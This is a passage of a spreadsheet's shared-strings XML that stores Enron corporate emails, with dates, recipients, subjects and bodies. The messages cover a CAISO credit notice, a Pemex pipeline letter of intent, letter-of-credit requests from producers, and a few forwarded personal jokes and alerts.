    <t>Fri, 25 May 2001 14:12:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAISO Notice - Supplemental Market Notice re Credit Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Please see attached notice, a supplemental notice to the April 13, 2001,_x000D_
Credit Issues Message._x000D_
_x000D_
_x000D_
 &lt;&lt;Supplemental Market Notice Creditworthines.doc.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
CRCommunications_x000D_
Client Relations_x000D_
_x000D_
_x000D_
_x000D_
 - Supplemental Market Notice Creditworthines.doc.doc </t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 11:13:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'g..stage@enron.com', 'lee.huber@enron.com', 'teb.lokey@enron.com', 'robert.kilmer@enron.com', 'mark.mcconnell@enron.com', 'drew.fossum@enron.com', 'steven.harris@enron.com', 'rod.hayslett@enron.com', 'd..martin@enron.com', 'danny.mccarty@enron.com'})</t>
  </si>
  <si>
    <t>Pemex - TransPecosj - Letter of Intent</t>
  </si>
  <si>
    <t xml:space="preserve">Although we expect to receive specific feedback on our July 6, 2001 proposal to Pemex for the TransPecos Pipeline very soon, we sent the attached letter today to Pemex (with a copy to Kinder Morgan) that will withdraw our proposal on October 1, 2001 if the LOI has not been executed.  _x000D_
_x000D_
Kinder Morgan has agreed with the sending of this letter.  Pemex has been aware of the contents of this letter since Monday, September 17._x000D_
_x000D_
We will keep you posted of our detailed discussions with Pemex as they proceed._x000D_
_x000D_
Thanks, _x000D_
_x000D_
Kim._x000D_
_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Feb 2000 01:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tanya.rohauer@enron.com', 'rod.nelson@enron.com'})</t>
  </si>
  <si>
    <t>Enron Corp. ("ENE") ISDA agreements</t>
  </si>
  <si>
    <t>Jeff Nogid has called about putting some ENE masters in place.  I have _x000D_
already spoken with Clement about this.  ENE will be trading FX, interest _x000D_
rate and equities through Gary's group.  Jeff mentioned names such as Merrill _x000D_
Lynch Cap. Services, Credit Suisse and Sumitomo.  He will obtain specific _x000D_
names and contacts at the various firms and forward that information to me _x000D_
and/or Shari.  We'll let you know.  Sara</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 11:06:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hasan.kedwaii@enron.com'})</t>
  </si>
  <si>
    <t>TW's "IOS" System</t>
  </si>
  <si>
    <t>I think Rich has told you that I spoke with him yesterday and would like to discuss what it would take to get a new IOS system up and running for TW.  Please give me a call or e:mail me to schedule a meeting to discuss.  I'm at 36007._x000D_
_x000D_
Thanks,_x000D_
Lindy</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 01:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: ltr to Kay Mann: Site specific references in GE Form_x000D_
 agreemen t.DOC</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,_x000D_
_x000D_
This is just intended to be a list of issues to be addressed in each project _x000D_
specific contract - a "to do" list to finish each one._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Shoemaker, Kent (GEAE)" &lt;kent.shoemaker@ae.ge.com&gt; on 11/16/2000 08:39:26 AM_x000D_
To: "'Dale.Rasmussen@enron.com'" &lt;Dale.Rasmussen@enron.com&gt;, _x000D_
Kay.Mann@enron.com_x000D_
cc: "Johnson, Lee L (PS, SSEP)" &lt;lee.johnson@ss.ps.ge.com&gt; _x000D_
_x000D_
Subject: FW: ltr to Kay Mann: Site specific references in GE Form agreemen _x000D_
t.DOC_x000D_
_x000D_
Dale and Kay:_x000D_
_x000D_
Lee and I looked at the proposed site specific letter and we wondered if_x000D_
what Dale did for the summary sheet may not be a better format.  Dale, can_x000D_
you forward it to the Kay and I to look at and consider._x000D_
_x000D_
Thanks._x000D_
_x000D_
Kent_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com] _x000D_
Sent: Tuesday, November 14, 2000 12:10 PM_x000D_
To: kent.shoemaker@ae.ge.com_x000D_
Subject: ltr to Kay Mann: Site specific references in GE Form_x000D_
agreement.DOC_x000D_
_x000D_
_x000D_
Hi Kent,_x000D_
_x000D_
Hope this is helpful._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 11/14/2000 11:09_x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;peterthompson@akllp.com&gt; on 11/13/2000 05:16:49 PM_x000D_
_x000D_
To:   "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt;, "Pipitone, Paul"_x000D_
      &lt;paulpipitone@akllp.com&gt;_x000D_
cc:   "Pipitone, Paul" &lt;paulpipitone@akllp.com&gt;, "Pipitone, Paul"_x000D_
      &lt;paulpipitone@akllp.com&gt;, "Cobb, Chris" &lt;chriscobb@akllp.com&gt;_x000D_
_x000D_
Subject:  ltr to Kay Mann: Site specific references in GE Form_x000D_
      agreement.DOC_x000D_
_x000D_
_x000D_
 &lt;&lt;ltr to Kay Mann: Site specific references in GE Form agreement.DOC&gt;&gt;_x000D_
_x000D_
Attached is the memo setting forth the specific Site references in the_x000D_
GE Turbine Agreement._x000D_
(See attached file:  Site specific references in GE Form agreement.DOC)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 05:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'angela.barnett@enron.com', 'jennifer.cutaia@enron.com', 'leslie.smith@enron.com', 'angela.gill@enron.com', 'maria.sandoval@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Someone, somewhere, needs you</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 11/08/2000 _x000D_
01:12 PM ---------------------------_x000D_
_x000D_
_x000D_
"SOCORRO HERNANDEZ" &lt;SUHERNAN@LLGM.COM&gt; on 11/08/2000 12:51:15 PM_x000D_
To: &lt;Judy.Hernandez@enron.com&gt;, &lt;irenepepe@hotmail.com&gt;, _x000D_
&lt;smanzanales@jw.com&gt;, "A. SUE GONZALES-GUEVARA" &lt;AGUEVARA@LLGM.COM&gt;, "HERBERT _x000D_
NORMAN" &lt;HNORMAN@LLGM.COM&gt;, "MARIA THOMPSON" &lt;MTHOMPSO@LLGM.COM&gt;, _x000D_
&lt;Maria.Soliz@ppfa.org&gt;, &lt;Erika.Zarate@reckittbenckiser.com&gt;, _x000D_
&lt;bburrell@tmh.tmc.edu&gt;_x000D_
cc:  _x000D_
Subject: Fwd: Someone, somewhere, needs you_x000D_
_x000D_
_x000D_
Love you all!_x000D_
_x000D_
Coco_x000D_
_x000D_
 - Jesus_1.pps_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 17:15:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'afternoon17@alerts.equityalert.com'})</t>
  </si>
  <si>
    <t>Your News Alert for TXN</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09[IMAGE]=09 =09[IMAGE]=09[IMAGE]=09_x000D_
_x000D_
_x000D_
             [IMAGE] [IMAGE]   [IMAGE] [IMAGE] Upgrades  [IMAGE] DownGrades=_x000D_
  [IMAGE] Coverage Initiated  [IMAGE] Coverage Reiterated  [IMAGE] Stock Sp=_x000D_
lits  [IMAGE] Buybacks  [IMAGE] Dividends  [IMAGE] Pos Pre-Announce  [IMAGE=_x000D_
] Neg Pre-Announce  [IMAGE] Pos Surprises  [IMAGE] Neg Surprises  [IMAGE] E=_x000D_
arnings Revisions  [IMAGE] IPO - Lockup Periods  [IMAGE] IPO - Latest Prici=_x000D_
ng  [IMAGE] IPO - Quite Periods  [IMAGE] IPO - Postponements  [IMAGE] IPO -=_x000D_
 Withdrawals  [IMAGE] IPO - Latest Filings     [IMAGE]   [IMAGE]   [IMAGE] =_x000D_
 [IMAGE]  [IMAGE] Unsubscribe  [IMAGE] Update  my Membership / Profile  [IM=_x000D_
AGE] Forgot  Username / Password  [IMAGE] Add  / Edit Alerts  [IMAGE] View =_x000D_
 My Alerts   [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE]  [IMAGE]    [IMAGE] =_x000D_
[IMAGE] [IMAGE] =09  As requested, your News Alert for TXN  follows from Eq=_x000D_
uityAlert.com.     CORRECTION-Texas Instruments Posts Narrower-Than-Expecte=_x000D_
d Loss, Warns For Next Quarter     (RealTimeTraders.com) - In the previous =_x000D_
headline "Misses Estimate By $0.01" should read "Beats Estimate By $0.01." =_x000D_
 A corrected and updated story follows: Texas Instruments Inc. (TXN) report=_x000D_
ed a loss for the third quarter Wednesday that was a penny narrower than ex=_x000D_
pected, but the company warned of a wider loss in the next fiscal period. T=_x000D_
he company reported a pro forma loss for the quarter of $57 million, or $0.=_x000D_
03 per share, down from a profit of $589 million, or $0.33 per share, in th=_x000D_
e same period last year. Wall Street analysts had expected the company to l=_x000D_
ose $0.04 per share, according to a survey conducted by First Call/Thomson =_x000D_
Financial. The company said revenues for the quarter were down significantl=_x000D_
y as well, falling from $3.13 billion last year to $1.85 billion this year.=_x000D_
 Looking ahead, the company said that it will have a loss for the fourth qu=_x000D_
arter of approximately $0.09 per share.  Market analysts currently project =_x000D_
the firm will lose $0.01 per share. Texas Instruments closed Wednesday's tr=_x000D_
ading at $29.91, down $1.58 on a volume of 11.4 million.  The stock has los=_x000D_
t an additional 91 cents on a volume of 31,600 shares in after hours action=_x000D_
. Copyright(c) 2001 RealTimeTraders.com, Inc. All Rights Reserved    [IMAGE=_x000D_
]    ***IMPORTANT NOTICE AND DISCLAIMER REGARDING THIS COURTESY EMAIL***   =_x000D_
At your request, as a subscriber to our service, this email alert is being =_x000D_
sent to you as a courtesy and is for information purposes only. We are a fi=_x000D_
nancial news re-distributor. We are not an investment advisory and do not p=_x000D_
urport to tell or suggest which companies you should monitor or which secur=_x000D_
ities you should purchase or sell.   In addition to the information regardi=_x000D_
ng the company you are monitoring (the "Monitored Company"), this email con=_x000D_
tains advertisements describing products, services or companies for which w=_x000D_
e receive fees from the advertising companies. In the case of Cybertrader, =_x000D_
distribution of this advertisement forms a component of a content exchange =_x000D_
agreement with RealTimeTraders.com, Inc. We reserve the right to sell all o=_x000D_
r part of these shares at anytime, either before, during or after the adver=_x000D_
tisement period.   In addition, not withstanding our policy of prohibiting =_x000D_
employees from buying or selling securities of an advertising company for a=_x000D_
 period of 20 days following dissemination of the advertisement, we may not=_x000D_
 be able to effectively monitor our employees to ensure compliance with the=_x000D_
 same. Consequently, there may be sales and/or purchases of such securities=_x000D_
 by our employees prior to, during and immediately following the disseminat=_x000D_
ion of the advertisement.   Please note that (1) this email may not contain=_x000D_
 the full text of the press release issued by, or the research or other rep=_x000D_
orts regarding, the Monitored Company; and (2) the text of the advertisemen=_x000D_
t, the press release and/or reports were obtained from third party sources =_x000D_
and were not written, generated or edited by us; accordingly, we make no re=_x000D_
presentations or give any assurance as to the accuracy or completeness, nor=_x000D_
 have we conducted any independent investigations of, the disclosures regar=_x000D_
ding the subject matter of such releases and reports.   Please note that li=_x000D_
nks to the advertising company and/or Monitored Company are provided for yo=_x000D_
ur convenience. We assume no obligation for the content of such sites.   Al=_x000D_
l information contained herein should be independently verified by you with=_x000D_
 the advertising company or with Monitored Company or any other sources you=_x000D_
 prefer.   [THIS IS ONLY A SUMMARY OF, AND IS QUALIFIED IN ITS ENTIRETY BY =_x000D_
REFERENCE TO, THE "EQUITYALERT SUBSCRIBER AGREEMENT AND DISCLAIMER." PLEASE=_x000D_
 VISIT http://www.equityalert.com/home/disclaim.asp  FOR ACCESS TO OUR COMP=_x000D_
LETE DISCLAIMER]        =09[IMAGE]     [IMAGE]  =09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 02:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Urgent request for Salary Adjustment</t>
  </si>
  <si>
    <t>Through the course of the year 22 people have been identified by east power _x000D_
as the key to their real time group.  No request will be granted on an _x000D_
emergency basis but will go through the usual process of getting facts and _x000D_
checking with me.  Another thing is that I don't know why we are not doing _x000D_
these things in conjunction with PRC so late in the year.</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 07:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Here is the ppt presentation to make the hard copies.</t>
  </si>
  <si>
    <t>FYI, this is the copy of the "business process patent presentation" given _x000D_
today by Larry Chaney of V&amp;E._x000D_
----- Forwarded by Barbara N Gray/HOU/ECT on 09/11/2000 02:37 PM -----_x000D_
_x000D_
	"Chaney, Larry" &lt;lchaney@velaw.com&gt;_x000D_
	09/11/2000 11:21 AM_x000D_
		 _x000D_
		 To: "'Gray, Barabara'" &lt;BGray@Enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Here is the ppt presentation to make the hard copies._x000D_
_x000D_
_x000D_
Please call if there are problems downloading.  Thanks!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;  &lt;&lt;MSTR_CLE3p.PPT&gt;&gt;_x000D_
&gt; +++++++++++++++++++++++_x000D_
&gt; CONFIDENTIALITY NOTICE_x000D_
&gt; +++++++++++++++++++++++_x000D_
&gt; The information in this email may be confidential and/or privileged. This_x000D_
&gt; email is intended to be reviewed by only the individual or organization_x000D_
&gt; named above. If you are not the intended recipient or an authorized_x000D_
&gt; representative of the intended recipient, you are hereby notified that any_x000D_
&gt; review, dissemination or copying of this email and its attachments, if_x000D_
&gt; any, or the information contained herein is prohibited. If you have_x000D_
&gt; received this email in error, please immediately notify the sender by_x000D_
&gt; return email and delete this email from your system. Thank You_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 - MSTR_CLE3p.PPT</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Resume - David Pruner</t>
  </si>
  <si>
    <t xml:space="preserve">What do you think?  He came very highly recommended from Amanda via voicemail._x000D_
m_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 12/19/2000 _x000D_
10:05 AM ---------------------------_x000D_
From: Amanda K Martin@AZURIX on 12/18/2000 05:15 PM_x000D_
Sent by: Susan Kalich@AZURIX_x000D_
To: Ken Rice/Enron Communications@Enron Communications, Mike _x000D_
McConnell/HOU/ECT@ECT, Jeffrey McMahon/HOU/ECT@ECT_x000D_
cc: Dorothy Dalton/Enron Communications@Enron Communications _x000D_
Subject: Resume - David Pruner_x000D_
_x000D_
As per our talks and voice mails.  Thanks -_x000D_
_x000D_
                         AKM/sak_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 12:02:08 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Producers requesting L/Cs</t>
  </si>
  <si>
    <t xml:space="preserve">Looks like there may have been a little confusion here, but it appears that the deal is still working as before. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Clayton, Lawrence  _x000D_
Sent:	Tuesday, October 30, 2001 1:53 PM_x000D_
To:	Hayslett, Rod_x000D_
Subject:	Producers requesting L/Cs_x000D_
_x000D_
Rod, I am very concerned about the statement that Enron cannot get any added LCs' issued.  This may be a disclosue event for us.  I think we need this retracted and for Enron to affirm there ability to perform under our facility.  Your thoughts?_x000D_
----- Forwarded by Lawrence Clayton/Houston/Eott on 10/30/2001 01:49 PM -----_x000D_
_x000D_
_x000D_
	Josie Castrejana 10/30/2001 11:19 AM 	   To: Lawrence Clayton/Houston/Eott@Eott  cc:   Subject: Producers requesting L/Cs	_x000D_
_x000D_
_x000D_
We have the following new requests for L/Cs to cover our lease purchases.  They are requesting L/Cs because of the Enron situation.  I've spoken with some of them and they just won't budge.  _x000D_
_x000D_
1.  Newfield Exploration		$3MM   	to cover Oct &amp; Nov_x000D_
2.  J. Cleo Thompson		$1.8MM to cover Oct &amp; Nov _x000D_
3.  Apache Corp.		$700K     to cover Nov_x000D_
4.  W. C. Miller			$175K     to cover Nov _x000D_
_x000D_
I've already spoken to Jesse Mata at Enron and she is telling me she cannot get any L/Cs issued - their banks are not allowing it.   I've got a call into Jack Insigna at Standard Chartered to see if they would be willing to EOTT's L/Cs.  He's checking.  _x000D_
_x000D_
We could prepay Apache - they are obviously not a credit risk.  the others i'm not sure about - we're checking their credit.  _x000D_
_x000D_
let me know about how much you're willing to with Enron.  thanks.  jc </t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 23:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: Hello</t>
  </si>
  <si>
    <t>Return-Path: &lt;abraham5@flash.net&gt;_x000D_
Received: from  rly-ye05.mx.aol.com (rly-ye05.mail.aol.com [172.18.151.202]) _x000D_
by air-ye02.mail.aol.com (v75_b3.15) with ESMTP; Fri, 15 Sep 2000 18:06:54 _x000D_
-0400_x000D_
Received: from  ogopogo.flash.net (ogopogo.flash.net [209.30.2.14]) by _x000D_
rly-ye05.mx.aol.com (v75_b3.9) with ESMTP; Fri, 15 Sep 2000 18:06:23 -0400_x000D_
Received: from Default (p118.amax23.dialup.hou1.flash.net [209.30.164.118]) _x000D_
by ogopogo.flash.net (8.9.3/Pro-8.9.3) with SMTP id QAA27038; Fri, 15 Sep _x000D_
2000 16:59:27 -0500 (CDT)_x000D_
Message-ID: &lt;001201c01f60$2f074160$76a41ed1@Default&gt;_x000D_
From: "Bonnie &amp; Rayford Abraham" &lt;abraham5@flash.net&gt;_x000D_
To: "Betty Nance" &lt;bettynance@dellnet.com&gt;,        "Carolyn Ashley" _x000D_
&lt;cashley@poha.com&gt;,        "Denise I. Moore" &lt;dimoore@airmail.net&gt;,        _x000D_
"Jacque' Washington Smith" &lt;faith1@pdq.net&gt;,        _x000D_
&lt;jwashing@mail.mdanderson.org&gt;,        "Moore,Denise I" _x000D_
&lt;denise.moore@dhs.state.tx.us&gt;,        "Thomas E Wallace" _x000D_
&lt;thomas456@juno.com&gt;,        "Bonnie G. Abraham" &lt;bgacg@flash.net&gt;,        _x000D_
"Claudette Montgomery" &lt;WMontg6626@aol.com&gt;,        "Edith Kelly" _x000D_
&lt;editherica@aol.com&gt;,        "Edith Kelly" _x000D_
&lt;edith-kelly@reliantenergy.com&gt;,        "Grace Jackson" _x000D_
&lt;gjack3@hotmail.com&gt;,        "Kevin and Dana Davis" &lt;kdavis2075@aol.com&gt;_x000D_
Subject: Hello_x000D_
Date: Fri, 15 Sep 2000 16:59:09 -0500_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/alternative; _x000D_
boundary="----=_NextPart_000_000F_01C01F36.43DE21A0"_x000D_
X-Priority: 3_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook Express 5.00.3018.1300_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300_x000D_
_x000D_
_x000D_
Please help to spread the word to all MOP  members._x000D_
?_x000D_
Rev. Jacque' has requested that we each  write down and bring our personal _x000D_
prayer  requests to class on Monday.? Anonymous?requests are fine--just  _x000D_
write?them down and bring them to class.? If you will not be in class,  _x000D_
please place your requests in an envelope and give them to Rev. Jacque' on  _x000D_
Sunday (or another MOP member)._x000D_
?_x000D_
Thanks_x000D_
Bonnie</t>
  </si>
  <si>
    <t>Mon, 10 Apr 2000 05:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>The Joys of Marriage</t>
  </si>
  <si>
    <t xml:space="preserve">As you will note from the email address, my last name is Scott.  If that is _x000D_
not enough information to derive my number I will have to question the level _x000D_
of intelligence I had previously afforded you.  However, as I hate having my _x000D_
illusions shattered, I'll save myself from possible disappointment and just _x000D_
give you the number...ext. 31455._x000D_
---------------------- Forwarded by Susan M Scott/HOU/ECT on 04/10/2000 12:09 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
04/07/2000 03:47 PM_x000D_
To: Gary Stadler/HOU/ECT@ECT, Sunil Dalal/Corp/Enron@ENRON, Nicholas J _x000D_
Stephan/HOU/ECT@ECT, Benjamin Freeman/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: The Joys of Marriage_x000D_
_x000D_
Please don't think less of me as a person, but this really made me laugh._x000D_
_x000D_
_x000D_
&gt; I've got game....'Ole!_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Subject:      FW: The Joys of Marriage_x000D_
&gt;_x000D_
&gt;  &lt;&lt;cuddles&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
 - FARTINGI.AVI_x000D_
 - RFC-822.TXT_x000D_
---------------------------------- Forwarded _x000D_
----------------------------------_x000D_
From: mwilkerson@ajilon.com at Internet-USA_x000D_
Date: 4/7/00 8:50AM -0500_x000D_
To: Shirley Elliott at DTT.US.HOUSTON_x000D_
*To: AMorse@EMJMETALS.COM at Internet-USA_x000D_
*To: hymela@netsolve.net at Internet-USA_x000D_
*To: bretts@mail.utexas.edu at Internet-USA_x000D_
*To: brian.sorensen@chase.com at Internet-USA_x000D_
*To: vmw@ispchannel.com at Internet-USA_x000D_
*To: Elrhea.stockton@dcicorp.com at Internet-USA_x000D_
*To: jdryer@kpmg.com at Internet-USA_x000D_
*To: jwaldman@ers.state.tx.us at Internet-USA_x000D_
*To: jim_stiffler@dell.com at Internet-USA_x000D_
*To: keith.hatley@allegiancetelecom.com at Internet-USA_x000D_
*To: sablica@compuserve.com at Internet-USA_x000D_
*To: mark_hooper@dell.com at Internet-USA_x000D_
*To: Michael_Ecklund@hines.com at Internet-USA_x000D_
*To: r8834c@email.sps.mot.com at Internet-USA_x000D_
*To: dmehta@uth.tmc.edu at Internet-USA_x000D_
*To: mdeshotels@rightnowtech.com at Internet-USA_x000D_
*To: pavri@bplaw.com at Internet-USA_x000D_
*To: pconnor@us.ibm.com at Internet-USA_x000D_
*To: RMoser@EMJMETALS.COM at Internet-USA_x000D_
*To: ryane@tocquigny.com at Internet-USA_x000D_
*To: Schoelpple@yahoo.com at Internet-USA_x000D_
*To: swlh@excite.com at Internet-USA_x000D_
*To: hookem@ev1.net at Internet-USA_x000D_
*To: wwindom@aol.com at Internet-USA_x000D_
*To: waldron50@yahoo.com at Internet-USA_x000D_
Subject: The Joys of Marriage_x000D_
------------------------------------------------------------------------------_x000D_
-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 07:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Just something to keep in mind - _x000D_
The confirms group in Houston is waiting on signed confirm letters from Grant _x000D_
County for the following three deals -_x000D_
_x000D_
432854_x000D_
420554_x000D_
420563_x000D_
_x000D_
I've let Stephanie Piwetz and Sharen Cason know that you'll forward the _x000D_
letters on to them once you receive them. Or you can give them to me and I'll _x000D_
fax them over. Keep me posted on the progress._x000D_
_x000D_
Thanks,_x000D_
Kate</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 13:35:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bill.rapp@enron.com', 'jan.moore@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'audrey.robertson@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'kimberly.watson@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>Final Updated Contact List</t>
  </si>
  <si>
    <t>_x000D_
Please see our contact list for the TW Commercial Team._x000D_
_x000D_
 _x000D_
adr_x000D_
_x000D_
Audrey D. Robertson_x000D_
Transwestern Pipeline Company _x000D_
email address:  audrey.robertson@enron.com_x000D_
(713) 853-5849_x000D_
(713) 646-2551 Fax</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 08:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FUNNY</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Genia FitzGerald/HOU/ECT on 09/01/2000 03:41 PM -----_x000D_
_x000D_
	Debra Perlingiere_x000D_
	09/01/2000 03:37 PM_x000D_
		 _x000D_
		 To: Genia FitzGerald/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: FUNNY_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
----- Forwarded by Debra Perlingiere/HOU/ECT on 09/01/2000 03:37 PM -----_x000D_
_x000D_
	Dan J Hyvl_x000D_
	07/21/2000 09:50 AM_x000D_
		 _x000D_
		 To: Debra Perlingiere/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: FUNNY_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
OHHHH - This is sooo funny!! I think that got the characters and the meeting_x000D_
agenda from here at NASA.  Actually I think I have been to a meeting like_x000D_
this!!!! HAHAHAHAHAHA!!_x000D_
Have a good weekend!!_x000D_
_x000D_
-Donna_x000D_
_x000D_
_x000D_
&gt;  &lt;&lt;Tso Meeting.exe&gt;&gt;  &lt;&lt;Chess.gif&gt;&gt;_x000D_
&gt;_x000D_
&gt; Joshua "Ayatollah of Rock and Rolla" Heck_x000D_
&gt; Technical Services and Operations_x000D_
&gt; Universal Weather and Aviation_x000D_
&gt; Palm e-mail - TSO1@palm.net_x000D_
&gt; (713)-944-1622 ext. 3673 (Work)_x000D_
&gt; (281)-788-4375 (Cell)_x000D_
&gt; (800)-222-6000 (E-Voicemail)_x000D_
&gt; Mailbox# 281-788-001_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 - Tso Meeting.exe_x000D_
 - Chess.gif_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 00:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hi John,_x000D_
_x000D_
Neil and I discussed this last night.  I know we are interested in at least _x000D_
as many games as we had last year.  I'll check with him and get back to you._x000D_
_x000D_
Hope all is well.  I haven't forgotten you!_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 12:38:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'usaa.electronic.documents@eddmail.usaa.com'})</t>
  </si>
  <si>
    <t>USAA Electronic Delivery Notification</t>
  </si>
  <si>
    <t>New electronic document(s) have been delivered and are available for you to read under your _x000D_
personal account at usaa.com. _x000D_
_x000D_
To access your documents:_x000D_
_x000D_
-   Go to http://www.usaa.com/ ._x000D_
-   Enter your USAA number and password and click "Log On". _x000D_
-   Click on "Documents" in the upper right corner.  You will then be _x000D_
    prompted to enter your PIN to display your documents index. If you _x000D_
    have previously activated the "Remember PIN" feature, you will not _x000D_
    be prompted for your PIN.  Always remember to protect your password _x000D_
    and PIN._x000D_
-   Review any unread documents in your index by clicking on the listed _x000D_
    document. Important information and legal notices are contained within _x000D_
    your documents._x000D_
-   To maintain a permanent record of your documents, you must print or _x000D_
    download the documents before the "Available Through" date listed on _x000D_
    your documents index._x000D_
-   The documents will no longer be available after the "Available Through" _x000D_
    date._x000D_
_x000D_
If you have questions or problems, information contained at usaa.com can help:_x000D_
_x000D_
-   The "About Electronic Documents" page, accessible from your documents _x000D_
    index, provides an overview of how USAA delivers electronic documents._x000D_
-   The "Frequently Asked Questions" (FAQs) section, also accessible from _x000D_
    the index, provides a question and answer format for common issues._x000D_
-   Review your USAA Electronic Document Delivery Agreement for terms and _x000D_
    conditions of this capability._x000D_
-   For issues and topics not covered in either of the above, call _x000D_
    1-800-285-8722 (210-282-9050 in San Antonio) for help.  _x000D_
-   To receive these courtesy notifications of new document deliveries, keep _x000D_
    your primary and secondary e-mail addresses current in your Personal _x000D_
    Profile on usaa.com._x000D_
_x000D_
Thank you for choosing to receive your documents electronically.</t>
  </si>
  <si>
    <t>Tue, 26 Dec 2000 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Trading Natural Gas : Cash Futures Options and Swaps</t>
  </si>
  <si>
    <t>sorry, just got your e-mail...I actually don't have any in hand anyway.  _x000D_
thanks for your interest._x000D_
_x000D_
fletch sturm</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 06:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pastoria IM</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Don Miller/HOU/ECT on 08/17/2000 01:38 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Ron.Coker@enron.com on 08/17/2000 01:30:37 PM_x000D_
To: don.miller@enron.com_x000D_
cc:  _x000D_
Subject: Pastoria IM_x000D_
_x000D_
_x000D_
(See attached file: IM_PEF_081600.doc)_x000D_
 - IM_PEF_081600.doc_x000D_
</t>
  </si>
  <si>
    <t>Re: Account Status</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently in negotiations with them.  Please do not forward my emails _x000D_
to Bank One.  Sara_x000D_
_x000D_
_x000D_
_x000D_
	David P Dupre_x000D_
	06/30/2000 10:51 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Account Status_x000D_
_x000D_
Hi,_x000D_
Do you know the current status of the Bank One account for NG?_x000D_
Jim has been inquiring about this._x000D_
_x000D_
Many thanks_x000D_
David_x000D_
